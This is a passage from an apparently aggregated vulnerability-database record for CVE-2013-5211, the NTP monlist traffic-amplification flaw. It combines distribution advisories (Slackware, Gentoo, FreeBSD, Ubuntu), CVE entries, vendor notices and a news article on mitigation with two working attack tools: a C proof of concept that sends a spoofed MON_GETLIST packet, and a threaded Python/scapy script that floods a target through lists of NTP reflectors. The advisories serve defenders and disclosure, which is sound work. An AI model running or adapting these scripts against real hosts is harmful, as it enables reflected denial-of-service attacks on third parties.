ChangeLog:\n\npatches/packages/ntp-4.2.6p5-i486-5_slack14.1.txz: Rebuilt.\n All stable 
versions of NTP remain vulnerable to a remote attack where the\n "ntpdc -c monlist" command can be used to amplify network traffic as part\n of a denial of service attack. By default, Slackware is not vulnerable\n since it includes "noquery" as a default restriction. However, it is\n vulnerable if this restriction is removed. To help mitigate this flaw,\n "disable monitor" has been added to the default ntp.conf (which will disable\n the monlist command even if other queries are allowed), and the default\n restrictions have been extended to IPv6 as well.\n All users of the NTP daemon should make sure that their ntp.conf contains\n "disable monitor" to prevent misuse of the NTP service. The new ntp.conf\n file will be installed as /etc/ntp.conf.new with a package upgrade, but the\n changes will need to be merged into any existing ntp.conf file by the admin.\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5211\n http://www.kb.cert.org/vuls/id/348126\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! 
:-)\n\nAlso see the "Get Slack" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/ntp-4.2.6p5-i486-1_slack13.0.txz\n\nUpdated package for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/ntp-4.2.6p5-x86_64-1_slack13.0.txz\n\nUpdated package for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/ntp-4.2.6p5-i486-1_slack13.1.txz\n\nUpdated package for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/ntp-4.2.6p5-x86_64-1_slack13.1.txz\n\nUpdated package for Slackware 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/ntp-4.2.6p5-i486-1_slack13.37.txz\n\nUpdated package for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/ntp-4.2.6p5-x86_64-1_slack13.37.txz\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/ntp-4.2.6p5-i486-3_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/ntp-4.2.6p5-x86_64-3_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/ntp-4.2.6p5-i486-5_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/ntp-4.2.6p5-x86_64-5_slack14.1.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/ntp-4.2.6p5-i486-5.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/ntp-4.2.6p5-x86_64-5.txz\n\n\n
Installation instructions:\n\nUpgrade the package as root:\n > upgradepkg ntp-4.2.6p5-i486-5_slack14.1.txz\n\nEnsure that your /etc/ntp.conf contains a line like this:\ndisable monitor\n\nThen, restart the NTP daemon:\n\n > sh /etc/rc.d/rc.ntpd restart", "cvss3": {}, "published": "2014-02-13T16:38:35", "type": "slackware", "title": "ntp", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2013-5211"], "modified": "2014-02-13T16:38:35", "id": "SSA-2014-044-02", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2014&m=slackware-security.575205", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "cve": [{"lastseen": "2023-09-12T13:45:10", "description": "The monlist feature in ntp_request.c in ntpd in NTP before 4.2.7p26 allows remote attackers to cause a denial of service (traffic amplification) via forged (1) 
REQ_MON_GETLIST or (2) REQ_MON_GETLIST_1 requests, as exploited in the wild in December 2013.", "cvss3": {}, "published": "2014-01-02T14:59:00", "type": "cve", "title": "CVE-2013-5211", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5211"], "modified": "2018-10-30T16:27:00", "cpe": ["cpe:/o:opensuse:opensuse:11.4", "cpe:/a:ntp:ntp:4.2.7"], "id": "CVE-2013-5211", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5211", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:ntp:ntp:4.2.7:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:opensuse:11.4:*:*:*:*:*:*:*"]}], "debiancve": [{"lastseen": "2023-09-13T10:42:14", "description": "The monlist feature in ntp_request.c in ntpd in NTP before 4.2.7p26 allows remote attackers to cause a denial of service (traffic amplification) via forged (1) REQ_MON_GETLIST or (2) REQ_MON_GETLIST_1 requests, as exploited in the wild in December 2013.", "cvss3": {}, "published": "2014-01-02T14:59:00", "type": "debiancve", "title": "CVE-2013-5211", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, 
"obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5211"], "modified": "2014-01-02T14:59:00", "id": "DEBIANCVE:CVE-2013-5211", "href": "https://security-tracker.debian.org/tracker/CVE-2013-5211", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:36", "description": "\nNTP ntpd monlist Query Reflection - Denial of Service", "cvss3": {}, "published": "2014-04-28T00:00:00", "type": "exploitpack", "title": "NTP ntpd monlist Query Reflection - Denial of Service", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5211"], "modified": "2014-04-28T00:00:00", "id": "EXPLOITPACK:61264D7F584A0F774F7A3A1AE8C27DB8", "href": "", "sourceData": "/*\n * Exploit Title: CVE-2013-5211 PoC - NTP DDoS amplification\n * Date: 28/04/2014\n * Code Author: Danilo PC - <DaNotKnow@gmail.com>\n * CVE : CVE-2013-5211\n*/\n\n/* I coded this program to help other to understand how an DDoS attack amplified by NTP servers works (CVE-2013-5211)\n * I took of the code that generates a DDoS, so this code only sends 1 packet. Why? Well...there's a lot of kiddies out there, \n * if you know how to program, making a loop or using with other tool is piece of cake. 
There core idea is there, just use it as you please.\n */\n\n//------------------------------------------------------------------------------------------------//\n//------------------------------------------------------------------------------------------------//\n\n\n#include <stdio.h> //For on printf function\n#include <string.h> //For memset\n#include <sys/socket.h> //Structs and Functions used for sockets operations.\n#include <stdlib.h>\t //For exit function\n#include <netinet/ip.h> //Structs for IP header\n\n//Struct for UDP Packet\nstruct udpheader{\n\tunsigned short int udp_sourcePortNumber;\n\tunsigned short int udp_destinationPortNumber;\n\tunsigned short int udp_length;\n\tunsigned short int udp_checksum;\n};\n\n// Struct for NTP Request packet. Same as req_pkt from ntpdc.h, just a little simpler\nstruct \tntpreqheader {\n\tunsigned char rm_vn_mode;\t\t/* response, more, version, mode */\n\tunsigned char auth_seq;\t\t/* key, sequence number */\n\tunsigned char implementation;\t\t/* implementation number */\n\tunsigned char request;\t\t\t/* request number */\n\tunsigned short err_nitems;\t\t/* error code/number of data items */\n\tunsigned short mbz_itemsize;\t\t/* item size */\n\tchar data[40];\t\t\t\t/* data area [32 prev](176 byte max) */\n\tunsigned long tstamp;\t\t\t/* time stamp, for authentication */\n\tunsigned int keyid;\t\t\t/* encryption key */\n\tchar mac[8]; \t\t/* (optional) 8 byte auth code */\n};\n\n\n// Calculates the checksum of the ip header.\nunsigned short csum(unsigned short *ptr,int nbytes) \n{\n register long sum;\n unsigned short oddbyte;\n register short answer;\n\n sum=0;\n while(nbytes>1) {\n sum+=*ptr++;\n nbytes-=2;\n }\n if(nbytes==1) {\n oddbyte=0;\n *((u_char*)&oddbyte)=*(u_char*)ptr;\n sum+=oddbyte;\n }\n\n sum = (sum>>16)+(sum & 0xffff);\n sum = sum + (sum>>16);\n answer=(short)~sum;\n return(answer);\n}\n\n\n//Da MAIN\n\nint main(int argc, char **argv)\n{\nint status;\t\t\t// Maintains the return values of the 
functions\nstruct iphdr *ip;\t\t// Pointer to ip header struct\nstruct udpheader *udp;\t\t// Pointer to udp header struct\nstruct ntpreqheader *ntp;\t// Pointer to ntp request header struct\nint sockfd;\t\t\t// Maintains the socket file descriptor\nint one = 1;\t\t\t// Sets the option IP_HDRINCL of the sockt to tell the kernel that the header are alredy included on the packets.\nstruct sockaddr_in dest;\t// Maintains the data of the destination address\nchar packet[ sizeof(struct iphdr) + sizeof(struct udpheader) + sizeof(struct ntpreqheader) ]; //Packet itself\n\n// Parameters check\n\tif( argc != 3){\n\t\tprintf(\"Usage: ./ntpDdos [Target IP] [NTP Server IP]\\n\");\n\t\tprintf(\"Example: ./ntpDdos 1.2.3.4 127.0.0.1 \\n\");\n\t\tprintf(\"Watch it on wireshark!\\n\");\n\t\tprintf(\"Coded for education purpose only!\\n\");\n\t\texit(1);\n\t}\n\n// Create a socket and tells the kernel that we want to use udp as layer 4 protocol\n\tsockfd = socket(PF_INET, SOCK_RAW, IPPROTO_UDP);\n\tif (sockfd == -1){\n\t\tprintf(\"Error on initializing the socket\\n\");\n\t\texit(1);\n\t}\n\n\n\n//Sets the option IP_HDRINCL\n\tstatus = setsockopt( sockfd, IPPROTO_IP, IP_HDRINCL, &one, sizeof one);\n\tif (status == -1){\n printf(\"Error on setting the option HDRINCL on socket\\n\");\n exit(1);\n }\n\n\n//\"Zeroes\" all the packet stack\n\tmemset( packet, 0, sizeof(packet) );\n\n\n//Mounts the packet headers\n// [ [IP HEADER] [UDP HEADER] [NTP HEADER] ] --> Victory!!!\n\tip = (struct iphdr *)packet;\n\tudp = (struct udpheader *) (packet + sizeof(struct iphdr) );\n\tntp = (struct ntpreqheader *) (packet + sizeof(struct iphdr) + sizeof(struct udpheader) );\n\n\n//Fill the IP Header\n\tip->version = 4;\t\t//IPv4\n ip->ihl = 5;\t\t\t//Size of the Ip header, minimum 5\n ip->tos = 0;\t\t\t//Type of service, the default value is 0\n ip->tot_len = sizeof(packet); //Size of the datagram\n ip->id = htons(1234); \t//LengthIdentification Number\n ip->frag_off = 0;\t\t//Flags, zero represents 
reserved\n ip->ttl = 255;\t \t\t//Time to Live. Maximum of 255\n ip->protocol = IPPROTO_UDP;\t//Sets the UDP as the next layer protocol\n ip->check = 0;\t \t\t//Checksum.\n ip->saddr = inet_addr( argv[1] ); //Source ip ( spoofing goes here)\n ip->daddr = inet_addr( argv[2] ); //Destination IP\n\n\t//Fills the UDP Header\n\tudp->udp_sourcePortNumber = htons( atoi( \"123\" ) ); //Source Port\n\tudp->udp_destinationPortNumber = htons(atoi(\"123\")) ; //Destination Port\n\tudp->udp_length = htons( sizeof(struct udpheader) + sizeof(struct ntpreqheader) ); //Length of the packet\n\tudp->udp_checksum = 0;\t\t\t\t //Checksum\n\n\t//Calculate the checksums\n\tip->check = csum((unsigned short *)packet, ip->tot_len); //Calculate the checksum for iP header\n\n\t//Sets the destination data\n\tdest.sin_family = AF_INET;\t\t\t\t // Address Family Ipv4\n\tdest.sin_port = htons (atoi( \"123\" ) ) ; \t\t// Destination port\n\tdest.sin_addr.s_addr = inet_addr( argv[2] ); // Destination Endere\u00e7o para onde se quer enviar o pacote \n\n\t//Fills the NTP header\n\t//Ok, here is the magic, we need to send a request ntp packet with the modes and codes sets for only MON_GETLIST\n\t//To do this we can import the ntp_types.h and use its structures and macros. To simplify i've created a simple version of the \n\t// ntp request packet and hardcoded the values for the fields to make a \"MON_GETLIST\" request packet. 
\n\t// To learn more, read this: http://searchcode.com/codesearch/view/451164#127\n\tntp->rm_vn_mode=0x17; //Sets the response bit to 0, More bit to 0, Version field to 2, Mode field to 7\n\tntp->implementation=0x03; //Sets the implementation to 3\n\tntp->request=0x2a;\t //Sets the request field to 42 ( MON_GETLIST )\n\t\t\t\t //All the other fields of the struct are zeroed\n\t\n\n\t// Sends the packets\n\tstatus = sendto(sockfd, packet, ip->tot_len, 0, (struct sockaddr *)&dest, sizeof(dest) );\n\t\tif(status <0){\n\t\t\tprintf(\"Failed to send the packets\\n\");\n\t\t\texit(1);\n\t\t}\n\n\n}", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "packetstorm": [{"lastseen": "2016-12-05T22:15:38", "description": "", "cvss3": {}, "published": "2014-07-16T00:00:00", "type": "packetstorm", "title": "NTP Amplification Denial Of Service Tool", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2013-5211"], "modified": "2014-07-16T00:00:00", "id": "PACKETSTORM:127492", "href": "https://packetstormsecurity.com/files/127492/NTP-Amplification-Denial-Of-Service-Tool.html", "sourceData": "`#!/usr/bin/env python \nfrom scapy.all import * \nimport sys \nimport threading \nimport time \n#NTP Amp DOS attack \n#by DaRkReD \n#usage ntpdos.py <target ip> <ntpserver list> <number of threads> ex: ntpdos.py 1.2.3.4 file.txt 10 \n \n#packet sender \ndef deny(): \n#Import globals to function \nglobal ntplist \nglobal currentserver \nglobal data \nglobal target \nntpserver = ntplist[currentserver] #Get new server \ncurrentserver = currentserver + 1 #Increment for next \npacket = IP(dst=ntpserver,src=target)/UDP(sport=48947,dport=123)/Raw(load=data) #BUILD IT \nsend(packet,loop=1) #SEND IT \n \n#So I dont have to have the same stuff twice \ndef printhelp(): \nprint \"NTP Amplification DOS Attack\" \nprint \"By DaRkReD\" \nprint \"Usage ntpdos.py <target ip> <ntpserver list> <number of threads>\" \nprint \"ex: ex: ntpdos.py 1.2.3.4 file.txt 10\" \nprint \"NTP serverlist 
file should contain one IP per line\" \nprint \"MAKE SURE YOUR THREAD COUNT IS LESS THAN OR EQUAL TO YOUR NUMBER OF SERVERS\" \nexit(0) \n \nif len(sys.argv) < 4: \nprinthelp() \n#Fetch Args \ntarget = sys.argv[1] \n \n#Help out idiots \nif target in (\"help\",\"-h\",\"h\",\"?\",\"--h\",\"--help\",\"/?\"): \nprinthelp() \n \nntpserverfile = sys.argv[2] \nnumberthreads = int(sys.argv[3]) \n#System for accepting bulk input \nntplist = [] \ncurrentserver = 0 \nwith open(ntpserverfile) as f: \nntplist = f.readlines() \n \n#Make sure we dont out of bounds \nif numberthreads > int(len(ntplist)): \nprint \"Attack Aborted: More threads than servers\" \nprint \"Next time dont create more threads than servers\" \nexit(1) \n \n#Magic Packet aka NTP v2 Monlist Packet \ndata = \"\\x17\\x00\\x03\\x2a\" + \"\\x00\" * 4 \n \n#Hold our threads \nthreads = [] \nprint \"Starting to flood: \"+ target + \" using NTP list: \" + ntpserverfile + \" With \" + str(numberthreads) + \" threads\" \nprint \"Use CTRL+C to stop attack\" \n \n#Thread spawner \nfor n in range(numberthreads): \nthread = threading.Thread(target=deny) \nthread.daemon = True \nthread.start() \n \nthreads.append(thread) \n \n#In progress! \nprint \"Sending...\" \n \n#Keep alive so ctrl+c still kills all them threads \nwhile True: \ntime.sleep(1) \n`\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/127492/ntpamp.py.txt"}], "fortinet": [{"lastseen": "2023-06-26T14:12:23", "description": "An insufficient control of network message volume (CWE-406) vulnerability in FortiAnalyzer may allow an unauthenticated remote attacker to perform NTP amplification attacks (thereby causing reflected denial of service on arbitrary targets) via sending specially crafted mode 6 queries to the FortiAnalyzer built-in NTP server. 
\n\n", "cvss3": {}, "published": "2020-06-22T00:00:00", "type": "fortinet", "title": "FortiAnalyzer could potentially be used in NTP amplification attacks", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5211"], "modified": "2020-06-22T00:00:00", "id": "FG-IR-20-036", "href": "https://www.fortiguard.com/psirt/FG-IR-20-036", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "gentoo": [{"lastseen": "2023-09-12T14:06:50", "description": "### Background\n\nNTP is a protocol designed to synchronize the clocks of computers over a network. The net-misc/ntp package contains the official reference implementation by the NTP Project. \n\n### Description\n\nntpd is susceptible to a reflected Denial of Service attack. Please review the CVE identifiers and references below for details. \n\n### Impact\n\nAn unauthenticated remote attacker may conduct a distributed reflective Denial of Service attack on another user via a vulnerable NTP server. \n\n### Workaround\n\nWe modified the default ntp configuration in =net-misc/ntp-4.2.6_p5-r10 and added \u201cnoquery\u201d to the default restriction which disallows anyone to query the ntpd status, including \u201cmonlist\u201d. \n\nIf you use a non-default configuration, and provide a ntp service to untrusted networks, we highly recommend you to revise your configuration to disable mode 6 and 7 queries for any untrusted (public) network. \n\nYou can always enable these queries for specific trusted networks. 
For more details please see the \u201cAccess Control Support\u201d chapter in the ntp.conf(5) man page. \n\n### Resolution\n\nAll NTP users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-misc/ntp-4.2.6_p5-r10\"\n \n\nNote that the updated package contains a modified default configuration only. You may need to modify your configuration further.", "cvss3": {}, "published": "2014-01-16T00:00:00", "type": "gentoo", "title": "NTP: Traffic amplification", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5211"], "modified": "2014-01-16T00:00:00", "id": "GLSA-201401-08", "href": "https://security.gentoo.org/glsa/201401-08", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "freebsd_advisory": [{"lastseen": "2023-09-12T15:49:37", "description": "\\-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 ============================================================================= FreeBSD-SA-14:02.ntpd Security Advisory The FreeBSD Project Topic: ntpd distributed reflection Denial of Service vulnerability Category: contrib Module: ntpd Announced: 2014-01-14 Affects: All supported versions of FreeBSD. 
Corrected: 2014-01-14 19:04:33 UTC (stable/10, 10.0-PRERELEASE) 2014-01-14 19:12:40 UTC (releng/10.0, 10.0-RELEASE) 2014-01-14 19:12:40 UTC (releng/10.0, 10.0-RC5-p1) 2014-01-14 19:12:40 UTC (releng/10.0, 10.0-RC4-p1) 2014-01-14 19:12:40 UTC (releng/10.0, 10.0-RC3-p1) 2014-01-14 19:12:40 UTC (releng/10.0, 10.0-RC2-p1) 2014-01-14 19:12:40 UTC (releng/10.0, 10.0-RC1-p1) 2014-01-14 19:20:41 UTC (stable/9, 9.2-STABLE) 2014-01-14 19:42:28 UTC (releng/9.2, 9.2-RELEASE-p3) 2014-01-14 19:42:28 UTC (releng/9.1, 9.1-RELEASE-p10) 2014-01-14 19:20:41 UTC (stable/8, 8.4-STABLE) 2014-01-14 19:42:28 UTC (releng/8.4, 8.4-RELEASE-p7) 2014-01-14 19:42:28 UTC (releng/8.3, 8.3-RELEASE-p14) CVE Name: CVE-2013-5211 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit . I. Background The ntpd(8) daemon is an implementation of the Network Time Protocol (NTP) used to synchronize the time of a computer system to a reference time source. II. Problem Description The ntpd(8) daemon supports a query 'monlist' which provides a history of recent NTP clients without any authentication. III. Impact An attacker can send 'monlist' queries and use that as an amplification of a reflection attack. IV. Workaround The administrator can implement one of the following possible workarounds to mitigate the attack: 1) Restrict access to ntpd(8). This can be done by adding the following lines to /etc/ntp.conf: restrict -4 default nomodify nopeer noquery notrap restrict -6 default nomodify nopeer noquery notrap restrict 127.0.0.1 restrict -6 ::1 restrict 127.127.1.0 And restart the ntpd(8) daemon. Time service is not affected and the administrator can still perform queries from local host. 2) Use IP based restrictions in ntpd(8) itself or in IP firewalls to restrict which systems can access ntpd(8). 3) Replace the base system ntpd(8) with net/ntp-devel (version 4.2.7p76 or newer) V. 
Solution Perform one of the following: 1) Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date. 2) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. # fetch http://security.FreeBSD.org/patches/SA-14:02/ntpd.patch # fetch http://security.FreeBSD.org/patches/SA-14:02/ntpd.patch.asc # gpg --verify ntpd.patch.asc b) Execute the following commands as root: # cd /usr/src # patch < /path/to/patch Recompile the operating system using buildworld and installworld as described in . Restart the ntpd(8) daemon, or reboot the system. 3) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install Note that the patch would disable monitoring features of ntpd(8) daemon by default. If the feature is desirable, the administrator can choose to enable it and firewall access to ntpd(8) service. VI. Correction details The following list contains the correction revision numbers for each affected branch. Branch/path Revision \\- ------------------------------------------------------------------------- stable/8/ r260641 releng/8.3/ r260647 releng/8.4/ r260647 stable/9/ r260641 releng/9.1/ r260647 releng/9.2/ r260647 stable/10/ r260639 releng/10.0/ r260641 \\- ------------------------------------------------------------------------- To see which files were modified by a particular revision, run the following command, replacing NNNNNN with the revision number, on a machine with Subversion installed: # svn diff -cNNNNNN --summarize svn://svn.freebsd.org/base Or visit the following URL, replacing NNNNNN with the revision number: VII. 
References The latest revision of this advisory is available at \n", "cvss3": {}, "published": "2014-01-14T00:00:00", "type": "freebsd_advisory", "title": "\nFreeBSD-SA-14:02.ntpd", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5211"], "modified": "2014-01-14T00:00:00", "id": "FREEBSD_ADVISORY:FREEBSD-SA-14:02.NTPD", "href": "https://www.freebsd.org/security/advisories/FreeBSD-SA-14:02.ntpd.asc", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "checkpoint_security": [{"lastseen": "2023-04-17T15:50:20", "description": "\n", "cvss3": {}, "published": "2014-03-01T22:00:00", "type": "checkpoint_security", "title": "Blocking NTP access on Gaia OS / IPSO OS (CVE-2013-5211)", "bulletinFamily": 
"software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5211"], "modified": "2014-03-01T22:00:00", "id": "CPS:SK98758", "href": "https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk98758", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "ubuntucve": [{"lastseen": "2023-09-21T11:13:00", "description": "The monlist feature in ntp_request.c in ntpd in NTP before 4.2.7p26 allows\nremote attackers to cause a denial of service (traffic amplification) via\nforged (1) REQ_MON_GETLIST or (2) REQ_MON_GETLIST_1 requests, as exploited\nin the wild in December 2013.\n\n#### Bugs\n\n * <http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=733940>\n * <http://bugs.ntp.org/show_bug.cgi?id=1532>\n * <https://bugs.launchpad.net/debian/+source/ntp/+bug/1268543>\n\n\n#### Notes\n\nAuthor| Note \n---|--- \n[mdeslaur](<https://launchpad.net/~mdeslaur>) | default ntp.conf in Ubuntu contains noquery, so monlist is disabled by default. Sites that need monlist should restrict it from known trusted IPs. Upstream has removed monlist in favour of mrulist. 
This is too intrusive to backport, so we're going to ignore this.\n", "cvss3": {}, "published": "2014-01-02T00:00:00", "type": "ubuntucve", "title": "CVE-2013-5211", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5211"], "modified": "2014-01-02T00:00:00", "id": "UB:CVE-2013-5211", "href": "https://ubuntu.com/security/CVE-2013-5211", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "thn": [{"lastseen": "2018-01-27T10:06:57", "description": "In 2013, we have seen a significant increase in the use of a specific distributed denial of service (DDoS) methodology known as [_Distributed Reflection Denial of Service attacks_](<https://thehackernews.com/search/label/DNS%20amplification>) (DrDoS). 
Open and misconfigured DNS (Domain Name System) servers, which anyone can use to resolve domain names to IP addresses, are increasingly abused to launch powerful DDoS attacks.\n\nBut it is not only DNS servers: security researchers at [Symantec](<http://www.symantec.com/connect/blogs/hackers-spend-christmas-break-launching-large-scale-ntp-reflection-attacks>) have spotted Network Time Protocol (NTP) reflection [DDoS attacks](<https://thehackernews.com/search/label/ddos%20attack?m=1>) being launched by cyber criminals during the Christmas Holidays.\n\n'_Network Time Protocol (NTP)_' is a distributed network clock time synchronization protocol that is used to synchronize computer clock times in a network of computers and runs over port 123 UDP.\n\n> NTP is one of those set-it-and-forget-it protocols that is configured once and most network administrators don't worry about it after that. Unfortunately, that means it is also not a service that is upgraded often, leaving it vulnerable to these reflection attacks.\n\nAs in a DNS reflection attack, the attacker sends small spoofed 8-byte UDP packets to the vulnerable NTP server, requesting that a large amount of data (megabytes' worth of traffic) be sent to the DDoS target's IP address. The CVE assigned to the NTP vulnerability is **[CVE-2013-5211](<https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5211&cid=1>).**\n\n> In this case, the attackers are taking advantage of the monlist command. Monlist is a remote command in an older version of NTP that sends the requester a list of the last 600 hosts who have connected to that server. For attackers the monlist query is a great reconnaissance tool.\n\nOn December 16, there were almost 15000 IP addresses involved in the NTP DDoS attack. 
These servers can be thought of as passive botnet members since the attacker can passively gather large lists of them.\n\nIf you manage a public NTP server, you can fix the issue by updating it to NTP 4.2.7, in which support for the 'monlist' query has been removed in favor of the new safe 'mrulist' function, which uses a nonce value to ensure that the received IP address matches the actual requester.\n", "cvss3": {}, "published": "2014-01-02T20:25:00", "type": "thn", "title": "Abusing Network Time Protocol (NTP) to perform massive Reflection DDoS attack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2013-5211"], "modified": "2014-01-03T07:25:06", "id": "THN:465F1B217D51F604B360DA109B4F9B83", "href": "https://thehackernews.com/2014/01/Network-Time-Protocol-Reflection-DDoS-Attack-Tool.html", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "ics": [{"lastseen": "2023-09-23T09:55:30", "description": "## OVERVIEW\n\nNCCIC/ICS-CERT has been following the increase 